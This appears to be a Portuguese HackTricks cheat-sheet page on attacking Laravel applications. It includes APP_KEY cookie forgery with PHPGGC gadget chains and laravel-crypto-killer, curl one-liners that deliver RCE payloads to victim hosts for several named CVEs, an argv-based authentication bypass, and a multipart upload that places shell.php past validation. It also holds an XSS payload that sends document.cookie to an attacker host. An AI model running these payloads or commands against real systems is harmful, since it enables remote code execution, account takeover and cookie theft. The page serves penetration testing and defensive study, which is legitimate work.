Laravel

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

• Confira os planos de assinatura!
• Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
• Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

Laravel SQLInjection

Leia mais sobre isso aqui: https://stitcher.io/blog/unsafe-sql-functions-in-laravel

APP_KEY & Encryption internals (Laravel >=5.6)

O Laravel usa AES-256-CBC (ou GCM) com integridade HMAC nos bastidores (Illuminate\Encryption\Encrypter). O ciphertext bruto que é finalmente enviado ao cliente é Base64 of a JSON object como:

{
"iv"   : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
"tag"  : ""                 // only used for AEAD ciphers (GCM)
}

encrypt($value, $serialize=true) vai serialize() o plaintext por padrão, enquanto decrypt($payload, $unserialize=true) vai automaticamente unserialize() o valor descriptografado. Portanto qualquer atacante que conheça a chave secreta de 32 bytes APP_KEY pode criar um objeto PHP serializado encriptado e obter RCE via métodos mágicos (__wakeup, __destruct, …).

PoC mínimo (framework ≥9.x):

use Illuminate\Support\Facades\Crypt;

$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste

Injete a string produzida em qualquer sink decrypt() vulnerável (route param, cookie, session, …).

laravel-crypto-killer 🧨

laravel-crypto-killer automatiza todo o processo e adiciona um conveniente modo bruteforce:

# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"

# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>

# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt

O script suporta de forma transparente payloads CBC e GCM e regera o campo HMAC/tag.

Padrões vulneráveis no mundo real

O fluxo de exploração é sempre:

1. Obter ou brute-force a APP_KEY de 32 bytes.
2. Construir uma gadget chain com PHPGGC (por exemplo Laravel/RCE13, Laravel/RCE9 ou Laravel/RCE15).
3. Criptografar o gadget serializado com laravel_crypto_killer.py e a APP_KEY recuperada.
4. Entregar o ciphertext ao sink vulnerável decrypt() (parâmetro de rota, cookie, session …) para disparar RCE.

Abaixo estão one-liners concisos demonstrando o caminho completo do ataque para cada CVE do mundo real mencionado acima:

# Invoice Ninja ≤5 – /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
xargs -I% curl "https://victim/route/%"

# Snipe-IT ≤6 – XSRF-TOKEN cookie
php7.4 phpggc Laravel/RCE9 system id -b | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login

# Crater – cookie-based session
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login

Descoberta massiva de APP_KEY via cookie brute-force

Porque cada resposta nova do Laravel define pelo menos 1 cookie criptografado (XSRF-TOKEN e geralmente laravel_session), scanners públicos da internet (Shodan, Censys, …) leak milhões de ciphertexts que podem ser atacados offline.

Principais descobertas da pesquisa publicada pela Synacktiv (2024-2025):

• Conjunto de dados julho de 2024 » 580 k tokens, 3.99 % keys cracked (≈23 k)
• Conjunto de dados maio de 2025 » 625 k tokens, 3.56 % keys cracked

• 1 000 servidores ainda vulneráveis ao CVE-2018-15133 legado porque os tokens contêm diretamente dados serializados.

• Reuso massivo de chaves – os Top-10 APP_KEYs são hard-coded defaults fornecidos com templates comerciais do Laravel (UltimatePOS, Invoice Ninja, XPanel, …).

A ferramenta Go privada nounours empurra o throughput de bruteforce AES-CBC/GCM para ~1.5 bilhões de tentativas/s, reduzindo o cracking do dataset completo para <2 minutos.

CVE-2024-52301 – HTTP argv/env override → bypass de autenticação

Quando o PHP tem register_argc_argv=On (típico em muitas distros), o PHP expõe um array argv para requisições HTTP derivado da query string. Versões recentes do Laravel parseavam esses argumentos “CLI-like” e honravam --env=<value> em runtime. Isso permite alternar o ambiente do framework para a requisição HTTP atual apenas adicionando isso a qualquer URL:

• Verificação rápida:

• Visite https://target/?--env=local ou qualquer string e procure por mudanças dependentes do ambiente (debug banners, footers, verbose errors). Se a string for refletida, o override está funcionando.

• Exemplo de impacto (lógica de negócio confiando em um env especial):

• Se a app contiver ramos como if (app()->environment('preprod')) { /* bypass auth */ }, você pode autenticar sem credenciais válidas enviando o POST de login para:

• POST /login?--env=preprod

• Notas:

• Funciona por requisição, sem persistência.

• Requer register_argc_argv=On e uma versão vulnerável do Laravel que lê argv para HTTP.

• Primitiva útil para expor erros mais verbosos em envs de “debug” ou para disparar caminhos de código condicionados ao ambiente.

• Mitigações:

• Desative register_argc_argv para PHP-FPM/Apache.

• Atualize o Laravel para ignorar argv em requisições HTTP e remova quaisquer suposições de confiança ligadas a app()->environment() em rotas de produção.

Fluxo mínimo de exploração (Burp):

POST /login?--env=preprod HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
...
email=a@b.c&password=whatever&remember=0xdf

CVE-2025-27515 – Bypass de validação de arquivo com curinga (files.*)

Laravel 10.0–10.48.28, 11.0.0–11.44.0 and 12.0.0–12.1.0 permitem que requests multipart forjados ignorem completamente qualquer regra anexada a files.* / images.*. O parser que expande chaves com wildcard pode ser confundido por placeholders controlados pelo atacante (por exemplo, pré-populando segmentos __asterisk__), então o framework acaba hidratando objetos UploadedFile sem nunca executar image, mimes, dimensions, max, etc. Uma vez que um blob malicioso cair em Storage::putFile* você pode pivotar para qualquer uma das primitivas de upload de arquivos já listadas em HackTricks (web shells, log poisoning, signed job deserialization, …).

Procurando pelo padrão

• Estático: rg -n "files\\.\*" -g"*.php" app/ ou inspecione classes FormRequest em busca de rules() que retornem arrays contendo files.*.
• Dinâmico: hook em Illuminate\Validation\Validator::validate() via Xdebug ou Laravel Telescope em pré-produção para registrar toda requisição que acione a regra vulnerável.
• Revisão de middleware/rotas: endpoints que agrupam múltiplos arquivos (importadores de avatar, portais de documentos, componentes de arrastar-e-soltar) tendem a confiar em files.*.

Fluxo prático de exploração

1. Capture um upload legítimo e reproduza-o no Burp Repeater.
2. Duplique a mesma parte, mas altere o nome do campo para que já inclua tokens de placeholder (ex.: files[0][__asterisk__payload]) ou aninhe outro array (files[0][alt][0]). Em builds vulneráveis, essa segunda parte nunca é validada mas ainda se torna uma entrada UploadedFile.
3. Aponte o arquivo forjado para um payload PHP (shell.php, .phar, polyglot) e force a aplicação a armazená-lo em um disco acessível via web (comumente public/ depois que php artisan storage:link estiver habilitado).

curl -sk https://target/upload \
-F 'files[0]=@ok.png;type=image/png' \
-F 'files[0][__asterisk__payload]=@shell.php;type=text/plain' \
-F 'description=lorem'

Continue fuzzing os nomes das chaves (files.__dot__0, files[0][0], files[0][uuid] …) até encontrar um que contorne o validador mas ainda seja escrito no disco; versões corrigidas rejeitam esses nomes de atributo criados imediatamente.

Vulnerabilidades de pacotes do ecossistema que valem a pena encadear (2025)

CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (affects auth0/laravel-auth0)

Se o projeto usa login Auth0 com o backend CookieStore padrão e auth0/auth0-php < 8.14.0, a tag GCM do cookie de sessão auth0 é curta o suficiente para brute-force offline. Capture um cookie, altere o payload JSON (por exemplo, defina "sub":"auth0|admin" e app_metadata.roles), brute-force a tag e reproduza-o para obter uma sessão válida do guard do Laravel. Verificações rápidas: composer.lock mostra auth0/auth0-php <8.14.0 e .env tem AUTH0_SESSION_STORAGE=cookie.

CVE-2025-48490 – lomkit/laravel-rest-api validation override

O pacote lomkit/laravel-rest-api antes da 2.13.0 mescla as regras por ação incorretamente: definições posteriores substituem as anteriores para o mesmo atributo, permitindo que campos criados pulem a validação (por exemplo, sobrescrever as regras de filter durante uma ação de update), levando a mass assignment ou filtros tipo SQL sem validação. Verificações práticas:

• composer.lock lista lomkit/laravel-rest-api <2.13.0.
• /_rest/users?filters[0][column]=password&filters[0][operator]== é aceito em vez de rejeitado, mostrando que a validação de filter foi contornada.

Truques do Laravel

Modo de depuração

Se o Laravel estiver em modo de depuração você poderá acessar o código e os dados sensíveis.
Por exemplo http://127.0.0.1:8000/profiles:

Isso geralmente é necessário para explorar outras CVEs de RCE do Laravel.

CVE-2024-13918 / CVE-2024-13919 – reflected XSS in Whoops debug pages

• Affected: Laravel 11.9.0–11.35.1 com APP_DEBUG=true (ou globalmente ou forçado via overrides de env mal configurados como CVE-2024-52301).
• Primitive: toda exceção não capturada renderizada pelo Whoops ecoa partes da request/route sem encoding HTML, então injetar <img src> / <script> em uma rota ou parâmetro de request resulta em XSS armazenado na resposta antes da autenticação.
• Impact: steal XSRF-TOKEN, leak stack traces with secrets, abrir um pivot via navegador para atingir _ignition/execute-solution em sessões de vítimas, ou encadear com painéis sem senha que dependem de cookies.

Minimal PoC:

// blade/web.php (attacker-controlled param reflected)
Route::get('/boom/{id}', function ($id) {
abort(500);
});

curl -sk "https://target/boom/%3Cscript%3Efetch('//attacker/x?c='+document.cookie)%3C/script%3E"

Mesmo que o modo de debug normalmente esteja desligado, forçar um erro através de background jobs ou queue workers e sondar o endpoint _ignition/health-check frequentemente revela hosts de staging que ainda expõem essa cadeia.

Fingerprinting & exposed dev endpoints

Verificações rápidas para identificar uma stack Laravel e ferramentas de desenvolvimento perigosas expostas em produção:

• /_ignition/health-check → Ignition presente (ferramenta de debug usada por CVE-2021-3129). Se acessível sem autenticação, a app pode estar em modo de debug ou mal configurada.
• /_debugbar → Assets do Laravel Debugbar; frequentemente indica modo de debug.
• /telescope → Laravel Telescope (monitor de desenvolvimento). Se público, espere ampla divulgação de informações e possíveis ações.
• /horizon → Queue dashboard; divulgação de versão e, às vezes, ações protegidas por CSRF.
• X-Powered-By, cookies XSRF-TOKEN and laravel_session, e páginas de erro Blade também ajudam no fingerprinting.

# Nuclei quick probe
nuclei -nt -u https://target -tags laravel -rl 30
# Manual spot checks
for p in _ignition/health-check _debugbar telescope horizon; do curl -sk https://target/$p | head -n1; done

.env

Laravel salva a APP que usa para encrypt os cookies e outras credenciais dentro de um arquivo chamado .env que pode ser acessado usando um path traversal em: /../.env

Laravel também mostrará essa informação na página de debug (que aparece quando o Laravel encontra um erro e está ativada).

Usando o APP_KEY secreto do Laravel você pode decrypt e re-encrypt cookies:

Decrypt Cookie

</details>

### Laravel Deserialization RCE

Versões vulneráveis: 5.5.40 e 5.6.x até 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))

Aqui você pode encontrar informações sobre a deserialization vulnerability: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)

Você pode testar e executar um exploit usando [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Ou você também pode executar um exploit com metasploit: `use unix/http/laravel_token_unserialize_exec`

### CVE-2021-3129

Outra deserialization: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)



## Referências
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : analyse de fuite d’APP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
* [CVE-2024-52301 advisory – Laravel argv env detection](https://github.com/advisories/GHSA-gv7v-rgg6-548h)
* [CVE-2024-52301 PoC – register_argc_argv HTTP argv → --env override](https://github.com/Nyamort/CVE-2024-52301)
* [0xdf – HTB Environment (CVE‑2024‑52301 env override → auth bypass)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
* [GHSA-78fx-h6xr-vch4 – Laravel wildcard file validation bypass (CVE-2025-27515)](https://github.com/laravel/framework/security/advisories/GHSA-78fx-h6xr-vch4)
* [SBA Research – CVE-2024-13919 reflected XSS in debug-mode error page](http://www.openwall.com/lists/oss-security/2025/03/10/4)
* [CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (laravel-auth0)](https://www.wiz.io/vulnerability-database/cve/cve-2025-47275)
* [CVE-2025-48490 – lomkit/laravel-rest-api validation override](https://advisories.gitlab.com/pkg/composer/lomkit/laravel-rest-api/CVE-2025-48490/)


> [!TIP]
> Aprenda e pratique Hacking AWS:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Aprenda e pratique Hacking GCP: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Aprenda e pratique Hacking Azure: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Supporte o HackTricks</summary>
>
> - Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
> - **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
>
> </details>